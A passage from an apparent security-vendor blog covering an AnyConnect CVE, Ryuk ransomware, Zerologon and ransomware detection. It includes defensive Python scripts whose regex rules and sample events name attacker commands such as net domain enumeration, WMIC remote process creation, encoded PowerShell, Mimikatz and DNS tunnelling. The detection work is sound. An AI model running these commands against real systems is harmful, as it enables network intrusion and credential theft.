    CVE-2020-3556 affects the AnyConnect Secure Mobility Client for Linux, macOS, and Windows when Bypass Downloader is set to its default value of false.

    You can verify your Bypass Downloader configuration by opening the AnyConnectLocalPolicy.xml file and searching for <BypassDownloader>false</BypassDownloader>.

    If your Bypass Downloader is set to true, the device is not affected by this vulnerability, according to Cisco.

    This vulnerability doesn’t affect the AnyConnect client for Apple iOS or Android.
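    The manual check above scales poorly across a fleet, so here is an added example (not Cisco's or Blumira's code) that performs it programmatically: it parses the local policy XML, finds the BypassDownloader element regardless of any namespace the file declares, and reports the host as affected unless the value is an explicit true. The default file locations in POLICY_PATHS and the sample policy fragments are assumptions constructed for this example; only the BypassDownloader element itself comes from the advisory.

```python
import sys
import xml.etree.ElementTree as ET

# Default locations of the local policy file. These paths are an assumption
# for this example; confirm them against Cisco's AnyConnect administrator
# guide for your version before relying on them.
POLICY_PATHS = {
    "win32": r"C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\AnyConnectLocalPolicy.xml",
    "darwin": "/opt/cisco/anyconnect/AnyConnectLocalPolicy.xml",
    "linux": "/opt/cisco/anyconnect/AnyConnectLocalPolicy.xml",
}

# Constructed policy fragments. Only the <BypassDownloader> element comes from
# the advisory text; the root element, attribute and namespace are invented so
# the parser can be exercised offline.
SAMPLE_DEFAULT = """<AnyConnectLocalPolicy acversion="0.0">
  <BypassDownloader>false</BypassDownloader>
</AnyConnectLocalPolicy>"""

SAMPLE_HARDENED = """<AnyConnectLocalPolicy xmlns="urn:constructed:example" acversion="0.0">
  <BypassDownloader>true</BypassDownloader>
</AnyConnectLocalPolicy>"""

SAMPLE_MISSING = "<AnyConnectLocalPolicy/>"


def bypass_downloader_value(xml_text):
    """Return the text of <BypassDownloader> (stripped, lower-cased) or None if
    the element is absent. ElementTree renders namespaced tags as {uri}local;
    the prefix is discarded so the lookup works with or without an xmlns."""
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "BypassDownloader":
            return (el.text or "").strip().lower()
    return None


def is_affected(xml_text):
    """Per the advisory, the client is affected while BypassDownloader is false,
    which is its default. Anything other than an explicit 'true' (including a
    missing element) is therefore reported as affected."""
    return bypass_downloader_value(xml_text) != "true"


def audit_policy_file(path=None):
    """Read the local policy file for this platform and report its status."""
    if path is None:
        key = "linux" if sys.platform.startswith("linux") else sys.platform
        path = POLICY_PATHS[key]
    with open(path, encoding="utf-8") as fh:
        return is_affected(fh.read())


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print("affected" if audit_policy_file(target) else "not affected (BypassDownloader=true)")
```

    Run it with no arguments on an endpoint to use the assumed platform path, or pass the policy file path explicitly. Treating a missing element as affected is the conservative choice: a host that has never had the setting changed is on the default.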

    Mitigation for CVE-2020-3556

    There are currently no software updates available to address the AnyConnect zero-day, CVE-2020-3556. Cisco plans to fix this vulnerability in a future release of Cisco AnyConnect Secure Mobility Client software.

    Additional Resources

    Cisco’s Security Advisory for CVE-2020-3556

    AnyConnect Integration

    Blumira’s cloud SIEM integrates easily with Cisco AnyConnect to start detecting threats immediately and automating response. Learn more about Blumira’s Cisco AnyConnect integration (logs delivered through ASA firewall & FTD Firepower Threat Defense).


    Medium
    November 4, 2020

    Ryuk Ransomware Targets Healthcare Organizations

    A joint cybersecurity advisory (PDF) was released last week by U.S. agencies informing the healthcare and public health sector of recent ransomware activity

    Healthcare
    Ransomware

    A joint cybersecurity advisory (PDF) was released last week by U.S. agencies informing the healthcare and public health sector of recent ransomware activity (also known as CISA Alert AA20-302A).

    In their advisory, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) caution that attackers are targeting healthcare organizations with malware that results in ransomware infection, data theft and disruption of service. They express particular concern for healthcare organizations dealing with cyberthreats during the COVID-19 pandemic, and provide information to help them combat these risks.

    It’s Happening: Widespread Ryuk Ransomware Attacks

    In September, a Fortune 500 healthcare and hospital services provider, Universal Health Services (UHS), was hit by a Ryuk ransomware attack (BleepingComputer). The disruption caused a shutdown of their business operations and IT infrastructure to contain ransomware spread across their network.

    Last week, a medical center in Oregon, a New York-based health system, a Brooklyn hospital and several hospitals within a Vermont health network were hit by Ryuk ransomware. BleepingComputer cites Mandiant’s attribution to an Eastern European hacking group that plans to attack hundreds of other hospitals, while KrebsOnSecurity reported on a tip that they intend to deploy ransomware at more than 400 other U.S.-based healthcare facilities.

    A Closer Look at Ryuk Ransomware

    First seen in 2018, Ryuk ransomware infections have been steadily rising since July of this year, hitting 20 organizations per week (Check Point). So far in 2020, Ryuk is responsible for one-third of all ransomware incidents, according to statistics from SonicWall’s Capture Labs.

    According to the advisory, ransomware attackers will use robust and dual-purpose tools like Cobalt Strike and PowerShell Empire to steal credentials. Cobalt Strike is software that was created for adversary simulations and red team operations, normally used for penetration test engagements – but has also been seen in use for malicious purposes, according to Blumira’s Sr. Incident Detection Engineer Amanda Berlin in Analysis of a Threat: PowerShell Malicious Activity.

    Mimikatz, a Windows attack tool, lets them dump cleartext passwords or hash values from memory. With stolen credentials, attackers can move laterally and map your network to plan the scope of the ransomware infection.

    From an approach perspective, attackers are using Living off the Land (LotL) techniques to infect healthcare networks. That means that rather than leveraging zero-day exploits, they’re using tools or features that already exist in a target environment to conduct malicious activity. I wrote more about this topic in March – see Top Security Threats: Detecting Ransomware Tactics.

    Attackers are leveraging native Windows tools like net view and net computer to locate mapped network shares, domain controllers and Active Directory. To move laterally, attackers are also relying on native tools, such as PowerShell, Windows Management Instrumentation (WMI) and Remote Desktop Protocol (RDP).

    This shows that attackers are not using new or more advanced methods, but rather the same tactics, techniques and procedures (TTPs) that have already proven effective at evading detection and achieving ransomware infection.
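    Because these tools are legitimately present on every Windows host, the detection opportunity is the command line rather than the binary. The added example below is not CISA's, Mandiant's or Blumira's code; it runs a handful of command-line rules over constructed process-creation events whose field names are modelled on Sysmon Event ID 1 (Image, CommandLine, ParentImage, User). The hosts, users and commands are invented. It covers the net.exe enumeration and WMI remote execution named in the advisory and, as a generalization of the same Living off the Land idea, PowerShell execution-policy bypass and encoded commands; the burst logic separates one routine net view from a host that is enumerating the domain.

```python
import re
from collections import defaultdict

# Constructed process-creation events modelled on the fields Sysmon Event ID 1
# records (Image, CommandLine, ParentImage, User). Hosts, users, paths and
# commands are invented for this example.
SAMPLE_EVENTS = [
    r'Host=ws-07 User=CORP\jdoe ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\net.exe CommandLine=net view /domain',
    r'Host=ws-07 User=CORP\jdoe ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\net.exe CommandLine=net group "Domain Admins" /domain',
    r'Host=ws-07 User=CORP\jdoe ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\wbem\WMIC.exe CommandLine=wmic /node:srv-01 process call create "cmd.exe /c hostname"',
    r'Host=ws-12 User=CORP\svc-backup ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\update.ps1',
    r'Host=ws-03 User=CORP\asmith ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe -Command Get-Process',
    r'Host=ws-03 User=CORP\asmith ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\net.exe CommandLine=net use Z: \\fs01\share',
]

# (ATT&CK tactic, description, pattern). Patterns are deliberately simple and
# must be tuned against each environment's own admin tooling; the Mimikatz
# keyword rule in particular is trivially evaded by renaming the binary.
RULES = [
    ("discovery", "net.exe domain/share enumeration",
     re.compile(r"(^|\\)net1?(\.exe)?\s+(view|group|user|computer|localgroup)\b", re.I)),
    ("lateral_movement", "WMI remote process creation",
     re.compile(r"wmic(\.exe)?\s+/node:", re.I)),
    ("execution", "PowerShell execution-policy bypass",
     re.compile(r"powershell(\.exe)?\s.*-(ep|ex\w*)\s+bypass", re.I)),
    ("execution", "PowerShell encoded command",
     re.compile(r"powershell(\.exe)?\s.*-(e|ec|enc\w*)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("credential_access", "Mimikatz keyword in command line",
     re.compile(r"mimikatz", re.I)),
]

FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line):
    """key=value line -> dict; the lookahead lets values contain spaces."""
    return dict(FIELD_RE.findall(line.strip()))


def match_rules(command_line):
    return [(tactic, name) for tactic, name, rx in RULES if rx.search(command_line)]


def scan(lines):
    """Return (host, tactic, rule name, command line) for every rule hit."""
    hits = []
    for ev in map(parse_event, lines):
        for tactic, name in match_rules(ev.get("CommandLine", "")):
            hits.append((ev["Host"], tactic, name, ev["CommandLine"]))
    return hits


def discovery_bursts(hits, min_distinct=2):
    """Hosts that ran several distinct discovery commands. One 'net view' is
    routine admin work; a burst of enumeration from one host is worth a look."""
    per_host = defaultdict(set)
    for host, tactic, _name, cmd in hits:
        if tactic == "discovery":
            per_host[host].add(cmd)
    return {h: sorted(c) for h, c in per_host.items() if len(c) >= min_distinct}


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for hit in found:
        print(hit)
    print("discovery bursts:", discovery_bursts(found))
```

    The parent process and user fields are carried through on purpose: the same net group command from a help-desk account under a management console is a very different signal from one spawned by a service account under cmd.exe, and that context is what turns a string match into a triageable alert.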

    Ryuk Ransomware Infection Chain

    The advisory details the steps of ransomware infection as follows:

    • Attackers send out loaders through phishing campaigns that link to malicious websites or attach the malware to an email message (like TrickBot, BazarLoader or BazarBackdoor)
    • Then, loaders distribute the payload, deploy and execute the backdoor from a command & control (C2) server
    • Finally, they install malware and/or ransomware on a victim’s machine


    Ryuk Ransomware Loaders & Indicators of Compromise

    Attackers are leveraging TrickBot tools to deploy ransomware like Ryuk and Conti, and conduct a variety of other malicious activities, including credential harvesting; mail and point-of-sale data exfiltration; and cryptomining.

    The FBI reported on new TrickBot modules named Anchor – attackers use anchor_dns, a tool to send and receive stolen data. Anchor evades network defense solutions, blending malicious communications in with legitimate DNS (Domain Name System) traffic by using DNS tunneling.
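    Anchor's DNS tunnelling and the earlier SolarWinds note about restricting outbound traffic from monitoring servers and watching DNS behaviour with Sysmon both come down to the same telemetry: per-process DNS query logs. The added example below is not the FBI's, CISA's or Blumira's code. It parses constructed lines whose field names are modelled on Sysmon Event ID 22 (UtcTime, Image, QueryName, plus a reporting host), then applies two checks: an egress allowlist for a named monitoring server, and a subdomain heuristic that flags domains receiving many unique, long, high-entropy labels, which is what data carried in DNS queries looks like. All hosts, paths and domains are invented, the .example TLD is reserved for documentation, and the registered-domain split is a naive last-two-labels approximation rather than a Public Suffix List lookup.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed sample DNS query events, loosely modelled on the fields that
# Sysmon Event ID 22 (DnsQuery) records: UtcTime, Image and QueryName, plus the
# reporting host. Hosts, paths and domains are invented; .example is reserved
# for documentation.
SAMPLE_EVENTS = [
    r"UtcTime=2020-12-14T10:00:01 Host=orion-srv Image=C:\Orion\placeholder-orion-service.exe QueryName=updates.vendor-updates.example",
    r"UtcTime=2020-12-14T10:00:05 Host=orion-srv Image=C:\Orion\placeholder-orion-service.exe QueryName=api.vendor-updates.example",
    r"UtcTime=2020-12-14T10:00:09 Host=orion-srv Image=C:\Orion\placeholder-orion-service.exe QueryName=beacon.c2-placeholder.example",
    r"UtcTime=2020-12-14T10:01:00 Host=ws-01 Image=C:\Mail\mailclient.exe QueryName=mail.internal.example",
    r"UtcTime=2020-12-14T10:01:10 Host=ws-01 Image=C:\Windows\System32\svchost.exe QueryName=7f3a9c2d1e8b4f60a1b2c3d4e5f6a7b8.tunnel-placeholder.example",
    r"UtcTime=2020-12-14T10:01:11 Host=ws-01 Image=C:\Windows\System32\svchost.exe QueryName=0c1d2e3f4a5b6978a9b8c7d6e5f40312.tunnel-placeholder.example",
    r"UtcTime=2020-12-14T10:01:12 Host=ws-01 Image=C:\Windows\System32\svchost.exe QueryName=deadbeef0123456789abcdef0f1e2d3c.tunnel-placeholder.example",
    r"UtcTime=2020-12-14T10:01:13 Host=ws-01 Image=C:\Windows\System32\svchost.exe QueryName=55aa55aa0f0f1e1e2d2d3c3c4b4b5a5a.tunnel-placeholder.example",
    r"UtcTime=2020-12-14T10:02:00 Host=ws-02 Image=C:\Browser\browser.exe QueryName=www.portal.example",
]

# Egress policy (constructed): the monitoring server may resolve only the
# vendor's update domain and internal names; anything else is a violation.
EGRESS_POLICY = {"orion-srv": ["vendor-updates.example", "internal.example"]}

FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line):
    """key=value line -> dict; the lookahead lets values contain spaces."""
    return dict(FIELD_RE.findall(line.strip()))


def matches_allowlist(qname, allowed):
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in allowed)


def egress_violations(lines, policy=EGRESS_POLICY):
    """Queries from a policy-covered host for names outside its allowlist."""
    out = []
    for ev in map(parse_event, lines):
        allowed = policy.get(ev.get("Host"))
        if allowed is not None and not matches_allowlist(ev["QueryName"], allowed):
            out.append((ev["Host"], ev["QueryName"]))
    return out


def shannon_entropy(s):
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname):
    """Naive last-two-labels split (assumption for this offline example; a real
    deployment would consult the Public Suffix List)."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def tunneling_candidates(lines, min_subdomains=4, min_label_len=20, min_entropy=3.0):
    """Group queries by registered domain and flag those whose leftmost labels
    are numerous, long and high-entropy, i.e. shaped like encoded data."""
    subs = defaultdict(set)
    for ev in map(parse_event, lines):
        q = ev["QueryName"].lower().rstrip(".")
        dom = registered_domain(q)
        if q != dom:
            subs[dom].add(q[: -len(dom) - 1])
    flagged = {}
    for dom, names in subs.items():
        first = [n.split(".")[0] for n in names]
        mean_len = sum(map(len, first)) / len(first)
        mean_ent = sum(map(shannon_entropy, first)) / len(first)
        if len(names) >= min_subdomains and mean_len >= min_label_len and mean_ent >= min_entropy:
            flagged[dom] = {"unique_subdomains": len(names),
                            "mean_label_len": round(mean_len, 1),
                            "mean_entropy": round(mean_ent, 2)}
    return flagged


if __name__ == "__main__":
    print("egress violations:", egress_violations(SAMPLE_EVENTS))
    print("tunneling candidates:", tunneling_candidates(SAMPLE_EVENTS))
```

    The allowlist check is the detection counterpart of the firewall rule recommended earlier: if the monitoring server may only reach the vendor's update hosts, any other name it resolves is an alert on its own. The tunnelling heuristic needs thresholds tuned per environment, since CDNs and some telemetry services also generate long machine-looking labels, and the Image field is what lets an analyst tell a browser from a process that should never be talking to DNS at that volume.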

    Attackers have also been seen using BazarLoader/BazarBackdoor. They work together to infect and communicate with the same C2 infrastructure – it’s now one of the most commonly used vectors for ransomware deployment, according to the advisory.

    The advisory has detailed code and examples of file, directory and module names to look out for when it comes to TrickBot, BazarLoader and BazarBackdoor. Mandiant also released a list of domains and internet addresses used by a Ryuk threat actor group in previous attacks.

    Best Security Practices: Securing Networks From Ryuk Ransomware

    U.S. government agencies are advising healthcare organizations to secure their networks by:

    • Install patches as soon as updates are released, especially for Windows servers
    • Use multi-factor authentication everywhere possible, especially for access to critical applications or services
    • Disable the use of remote access or RDP ports and monitor remote access and RDP logs
    • Identify open ports and remediate any unnecessary ones
    • Audit user accounts with administrative privileges and use the principle of least privilege when configuring access controls
    • Audit logs for new account creation to ensure they’re legitimate

    Other preparatory actions to take include:

    • Prepare network lockdown protocols
    • Review incident response plans – maintain copies of data and servers in a separate, secure location
    • Identify and back up critical servers, medical records, and infrastructure – keep backups offline from the network
    • Set up strategies for redirecting patients in the event of a disruptive attack
    • Conduct employee (end user) awareness training on how phishing and ransomware are delivered

    Detecting & Responding to Ryuk Ransomware Early

    Early detection of attacker tactics and techniques can help you prevent a ransomware infection. Blumira automates detection and response for ransomware prevention and detection by:

    Reconnaissance Scanning – By detecting scanning tools on your network, Blumira can identify and alert you to an attacker early in the stages of an attack, before ransomware infection.

    Credential Attacks – Blumira detects RDP connections, password spraying, brute-force and more to alert you to attackers attempting to gain access to your network to install ransomware.

    Privilege Escalation – Blumira detects whenever administrator-level accounts are added or permissions are changed to alert you to attackers changing privileges in order to move laterally throughout your environment with malicious intent. Blumira can also monitor and alert on account creation.

    Data Exfiltration – Attackers are stealing data before infection to use as leverage for demanding a ransom – to prevent data exposure, Blumira detects data exfiltration and any anomalous internal web traffic indicating an attempt to exfiltrate data out of your environment.

    Malicious Applications and Files – Blumira detects and notifies your team when an application drops a new file or script on a machine, so you can respond quickly to block or contain malicious executables related to ransomware.

    Watch a demo to find out how or contact us to learn more. You can also sign up for a free account of Blumira’s platform to detect and respond to threats in Microsoft 365.



    Critical
    November 2, 2020

    Active Windows Exploits: CVE-2020-1472 & CVE-2019-1040

    In a recent advisory (PDF) issued by the U.S. National Security Agency (NSA), they caution that state-sponsored hackers are actively exploiting

    Microsoft Security
    CVE

    In a recent advisory (PDF) issued by the U.S. National Security Agency (NSA), they caution that state-sponsored hackers are actively exploiting 25 different vulnerabilities in attacks against National Security Systems (NSS), the U.S. Defense Industrial Base (DIB), and the Department of Defense (DoD) information networks.

    Attackers are exploiting Windows vulnerabilities for lateral movement and credential access, attempting to get access in order to move throughout your network and identify data to steal or systems to disrupt. Two vulnerabilities in particular were called out by the NSA as used by state-sponsored attackers, CVE-2020-1472 and CVE-2019-1040.

    Critical Windows Vulnerability, ZeroLogon Netlogon: CVE-2020-1472

    CVE-2020-1472 is one of the actively exploited vulnerabilities listed in the NSA advisory; Microsoft rates it Critical in its security severity rating, and it scores 10/10 on the CVSS (Common Vulnerability Scoring System) scale.

    Due to a flaw in the implementation of the Netlogon protocol encryption, anyone on a network can elevate their privileges to domain administrator. An attacker can establish a vulnerable Netlogon secure channel connection to a domain controller. That allows an attacker to gain access to your entire domain, enabling them to steal data, disrupt your network, deploy malware or ransomware, etc.

    Zerologon Mitigation

    This vulnerability affects Microsoft Windows Server 2008 – 2019. To mitigate, you should install the patch as soon as you’re able to, and implement additional instructions found in Microsoft’s support article (KB4557222).

    Microsoft has planned a two-part phased rollout of Windows updates for mitigation – the first, released in early August, helps protect Windows devices. The second phase, to be released in Q1 2021, will require all devices (including non-Windows) to use more secure protocols with the Netlogon secure channel. Microsoft’s security advisory for CVE-2020-1472 provides links to security updates and an FAQ on their plan.

    CVE-2019-1040: Windows NTLM Vulnerability

    A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. That means the attacker can downgrade Windows NTLM security features.

    A man-in-the-middle (MitM) attack is when an attacker intercepts communications between two parties either to secretly eavesdrop or modify traffic traveling between the two (CSOOnline).

    CVE-2019-1040 Mitigation

    This vulnerability affects Microsoft Windows 7 – 10 and Microsoft Windows Server 2008 – 2019. The NSA advisory lists the additional mitigation option of limiting the use of NTLM as much as possible, and stopping the use of NTLMv1. Microsoft’s security advisory for CVE-2019-1040 provides resources on the specific security updates you need, and documentation on reducing the use of NTLM.

    Detection & Response for Windows Security

    Blumira’s cloud SIEM platform integrates with Microsoft’s Active Directory, Microsoft Windows Server, Microsoft Windows DNS, Microsoft Windows PowerShell and more.

    Once integrated, Microsoft security event logs and alerts are streamed to Blumira’s platform, collecting and centralizing event information about users and computers to identify suspicious or threat-like events. Blumira correlates the data with known threats and detection rules, prioritizing alerts sent to your team with security playbooks to help guide you through incident response procedures.

    A few examples of Active Directory detections include user behavioral analytics, password spraying, rogue domain administration and much more. Our integration with Active Directory is also commonly used for audit purposes defined in common compliance frameworks such as PCI DSS and NIST 800-171.

    Want to Learn More?

    Join us this Thursday! Patrick Garrity, VP of Ops at Blumira and Jacob Julian, Solutions Engineer at Blumira will discuss Windows security and best practices, and give a demo of how you can use Blumira to easily detect and respond to Windows security incidents.

    In this roundtable discussion, you’ll learn about:

    • The basics of a Microsoft cloud security stack
    • Windows security detections and best practices
    • Office 365 and Azure security threats you should be able to detect

    This interactive, conversational-style session encourages questions and engagement with viewers – so sign up today for access to our security experts.

    RSVP to save your seat!

     

    Download Your Guide to Microsoft Security

    To help organizations running Microsoft environments, our guide gives you practical, step-by-step Windows tips to significantly improve your visibility into malicious activity.

    In this guide, you’ll learn:

    • How to use built-in Windows tools like System Monitor for advanced visibility into Windows server logs
    • How to configure Group Policy Objects (GPOs) to give you a deeper look into your Windows environment
    • Free, pre-configured tools from Blumira you can use to easily automate Windows logging to enhance detection & response
    • What indicators of security threats you should be able to detect for Microsoft Azure and Office 365

     

    Download the Guide

    Medium
    October 20, 2020

    Detect & Prevent Infection: 50% Rise in Ransomware Attacks

    Ransomware continues to strike businesses and governments globally, showing no signs of slowing down during the pandemic.

    Ransomware

    Ransomware continues to strike businesses and governments globally, showing no signs of slowing down during the pandemic. In a recent report by Check Point, researchers found that the daily average of ransomware attacks has increased by 50% in the last three months.

    2020 Ransomware Trends

    While much of the focus is on the encryption aspect of ransomware, Check Point’s researchers found that attackers are now exfiltrating large volumes of data before encrypting databases. Attackers are threatening to publish the data if their ransom demands aren’t met.

    Emotet and Ryuk Ransomware Infection

    This coincides with the rise of Emotet malware delivered through new phishing campaigns seen a few months ago, acting as a backdoor to download and execute payloads on a victim’s systems. Emotet has been linked to both TrickBot, an advanced malware affecting Windows machines, as well as Ryuk ransomware, a type of crypto-ransomware targeting enterprises. According to Check Point, Ryuk ransomware infections have been steadily rising since July 2020, attacking 20 organizations per week.

    Learn more in Detect and Protect Against the Return of Emotet Malware.

    Microsoft recently announced that they have “cut off key infrastructure” to disrupt new Trickbot infections and activations. The malware has been distributed widely through phishing campaigns leveraging current events as email topics, such as Black Lives Matter and COVID-19. According to The Washington Post, Microsoft won a court order to seize U.S.-based servers controlling a botnet, or network of computers infected by Trickbot. But Trickbot continues to operate on servers outside of the country, according to threat intelligence company Intel 471.

    Paying Ransom May Result in OFAC Violations & Fines

    According to the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC), demand for ransomware payments has only increased during the pandemic due to attackers targeting systems that people rely on to continue conducting business online. The FBI reports a 147% annual increase in ransomware-associated losses from 2018 to 2019 (Internet Crime Report PDF).

    OFAC issued an advisory (PDF) this month cautioning that any company that pays a ransomware ransom may be at risk of violating OFAC regulations and subject to monetary fines. Their reasons include: any transaction with criminals could be used to fund illicit activity counter to U.S. national security; payments embolden attackers; and paying a ransom doesn’t always guarantee victims will regain access to stolen data.

    Detecting Indicators of a Ransomware Attack

    Identifying the different stages of an attack that can lead to ransomware infection is important to enable your team to detect attackers early and remediate incidents faster. As outlined in the MITRE ATT&CK framework, Blumira detects and alerts you to key attacker techniques and tactics used for initial access, credential access, execution, persistence, privilege escalation, lateral movement, exfiltration and more.

    Below are the attack stages that can lead to a ransomware attack; Blumira detects and alerts on each, and can help guide your team through incident response procedures:

    Reconnaissance Scanning
    Attack Stage: Discovery
    In the early stages of an attack, an attacker is conducting reconnaissance during the discovery phase as they get to know your network, systems and applications better to help them understand how to launch an attack effectively. By detecting internal port scanning tools, Blumira can help alert you to an indicator of an internal attacker looking for vulnerable areas to attack and move laterally throughout your environment.

    RDP Connections
    Attack Stage: Initial Access
    Remote Desktop Protocol (RDP) is one of the top ways that remote attackers gain initial access to install ransomware. RDP is often used by businesses to allow users to remotely access files and applications on their local network. But when RDP ports are left open to the internet, it can allow anyone to access remote servers.

    Blumira detects and alerts you to public IPs connecting to your internal network via RDP for early detection of malicious activity that can lead to ransomware infection.

    Password Spraying
    Attack Stage: Credential Access (Brute Force)
    Password spraying is when an attacker attempts to authenticate to your network or applications by typing in multiple usernames paired with a single password. It’s used by attackers to discover weak passwords that can be used to move laterally throughout your environment, while targeting systems and data with ransomware. Blumira can detect and alert you to password spraying, as well as provide security playbooks for step-by-step remediation.

    Learn more in How to Test Your SIEM for Password Spraying.

    Account Lockouts
    Attack Stage: Credential Access (Brute Force)
    Account lockouts can be the result of too many failed login attempts, potentially due to a forgotten password or malicious brute-force attack to gain entry to your systems to install ransomware. Blumira can detect common account lockouts, as well as two-factor authentication account lockouts. We also provide next steps for internal incident response procedures, such as blocklisting source IPs and reviewing your authentication logs.
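    The difference between spraying and brute force is visible in the failed-logon stream itself, which is why the two detections above need different aggregation keys. The added example below is not Blumira's code; it builds constructed failed-logon records using a few Event ID 4625 field names (TimeCreated, IpAddress, TargetUserName, Status 0xC000006D for a bad username or password) and runs two sliding-window detectors over them: spraying groups by source address and counts distinct usernames, brute force groups by (source, account) and counts attempts. Addresses come from the documentation ranges and the usernames are invented.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def _event(time_str, ip, user):
    """Constructed failed-logon line using a few Event ID 4625 field names
    (Status 0xC000006D is 'unknown user name or bad password')."""
    return (f"TimeCreated=2020-10-19T{time_str} EventID=4625 IpAddress={ip} "
            f"TargetUserName={user} Status=0xC000006D")


# Sample data, constructed: one source tries six different users once each
# within three minutes (spray), another hammers one account eight times
# (classic brute force), and one internal host has a single failure.
SPRAY_USERS = ["alice", "bob", "carol", "dave", "erin", "frank"]
SAMPLE_EVENTS = (
    [_event(f"09:0{i // 2}:{'30' if i % 2 else '00'}", "198.51.100.23", u)
     for i, u in enumerate(SPRAY_USERS)]
    + [_event(f"09:1{i // 2}:{'30' if i % 2 else '00'}", "203.0.113.9", "jsmith")
       for i in range(8)]
    + [_event("08:00:00", "10.0.0.5", "gwen")]
)


def parse_event(line):
    ev = dict(pair.split("=", 1) for pair in line.split())
    ev["time"] = datetime.fromisoformat(ev["TimeCreated"])
    return ev


def _failed_logons(lines):
    return [e for e in map(parse_event, lines) if e["EventID"] == "4625"]


def detect_password_spray(lines, window=timedelta(minutes=10), min_users=5):
    """Many distinct usernames from one source inside a sliding time window.
    Per-user attempt counts stay low, so lockout thresholds never trip; the
    distinct-user count is what gives the attack away."""
    by_ip = defaultdict(list)
    for e in _failed_logons(lines):
        by_ip[e["IpAddress"]].append(e)
    flagged = defaultdict(set)
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["time"])
        recent = deque()
        for e in events:
            recent.append(e)
            while e["time"] - recent[0]["time"] > window:
                recent.popleft()
            users = {x["TargetUserName"].lower() for x in recent}
            if len(users) >= min_users:
                flagged[ip].update(users)
    return {ip: sorted(users) for ip, users in flagged.items()}


def detect_brute_force(lines, window=timedelta(minutes=10), min_attempts=5):
    """Many attempts against one (source, account) pair inside the window;
    this is the pattern that also produces account lockouts (Event ID 4740)."""
    by_key = defaultdict(list)
    for e in _failed_logons(lines):
        by_key[(e["IpAddress"], e["TargetUserName"].lower())].append(e["time"])
    flagged = defaultdict(dict)
    for (ip, user), times in by_key.items():
        times.sort()
        recent = deque()
        for t in times:
            recent.append(t)
            while t - recent[0] > window:
                recent.popleft()
            if len(recent) >= min_attempts:
                flagged[ip][user] = max(flagged[ip].get(user, 0), len(recent))
    return dict(flagged)


if __name__ == "__main__":
    print("password spray:", detect_password_spray(SAMPLE_EVENTS))
    print("brute force:", detect_brute_force(SAMPLE_EVENTS))
```

    Thresholds are the tuning knobs: a ten-minute window with five distinct users is a reasonable starting point for an internet-facing service, while internal sources usually need a higher bar to avoid paging on a misconfigured script. Lowering the window rather than the user count is the usual way to catch slower sprays without a flood of false positives.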

    Rogue Domain Admin Account Created
    Attack Stage: Privilege Escalation
    To get greater access privileges, attackers may attempt to create domain administrator accounts that allow them to deploy ransomware broadly across all servers, databases, storage systems, etc. Blumira can detect when a rogue domain admin account is created and notify you to disable it immediately.

    Data Exfiltration
    Attack Stage: Exfiltration
    Attackers are stealing data before ransomware infection to use as additional leverage for demanding money from victim organizations. Blumira detects data exfiltration via generic network protocols to alert you to an attacker’s actions. Our service also detects anomalous internal web traffic that may indicate attempts to exfiltrate data out of your environment.

    Application Executable or Script (Dropping Malware or Ransomware)
    Attack Stage: Execution
    Attackers download and execute malicious files in order to install ransomware on your systems. Blumira detects when an application is dropping a new file or script onto a machine and notifies your team of potentially malicious executables that may not be allow-listed, and could present a threat to your organization. This visibility allows you to detect a ransomware attack early and respond quickly to block or contain it.

    Best Security Practices to Help Defend Against Ransomware

    Here are a few best security practices to help prevent, detect and respond to the many security events that can lead to ransomware infection:

    Access Control – Practice least privilege by limiting access to applications and services to only those that need access to do their jobs.

    Two-Factor Authentication – Add an additional layer of security to every login with a secondary authentication method (preferably a secure one that uses push notifications and an authenticator app, not SMS).

    Secure Ports – RDP ports should never be allowed from public IP addresses, or left open to the internet. SMB (Server Message Block) connections should also not be allowed from public IPs, as they can allow attacks like EternalBlue (an SMB exploit) to occur, resulting in ransomware infection.

    Backups – Back up your system separately, both locally and offsite, and keep copies in the cloud for redundancy.

    Patch – Patch as frequently as you’re able to in order to protect against vulnerabilities and exploits used to gain initial access and install ransomware on your systems.

    User Awareness – Create a culture of security and regularly train users to spot phishing attacks and protect against downloading malicious attachments, a popular avenue for ransomware infection.

    Threat Detection – Faster detection leads to faster response times, which is key to detecting early attack indicators and ultimately, preventing ransomware infection. Learn more about automating detection and response with Blumira’s security platform, and how Blumira can help you prevent and detect ransomware infection.

    Ransomware Roundtable

    Join our ransomware roundtable this Thursday for a discussion of how to prevent and detect ransomware-related threats today.



    Critical
    October 14, 2020

    Ping of Death v2: Windows IPv6 Vulnerability (CVE-2020-16898/9)

    Microsoft has released 11 Critical level patches during this Patch Tuesday (including the latest Adobe Flash security update). However, two of these

    Microsoft Security
    CVE

    Microsoft has released 11 Critical level patches during this Patch Tuesday (including the latest Adobe Flash security update). However, two of the vulnerabilities being patched resemble a familiar type of attack from 2013, when Microsoft patched a bug in Windows’ TCP/IP driver. In that case, it was referred to as the “Ping of Death” vulnerability.

    How It Works

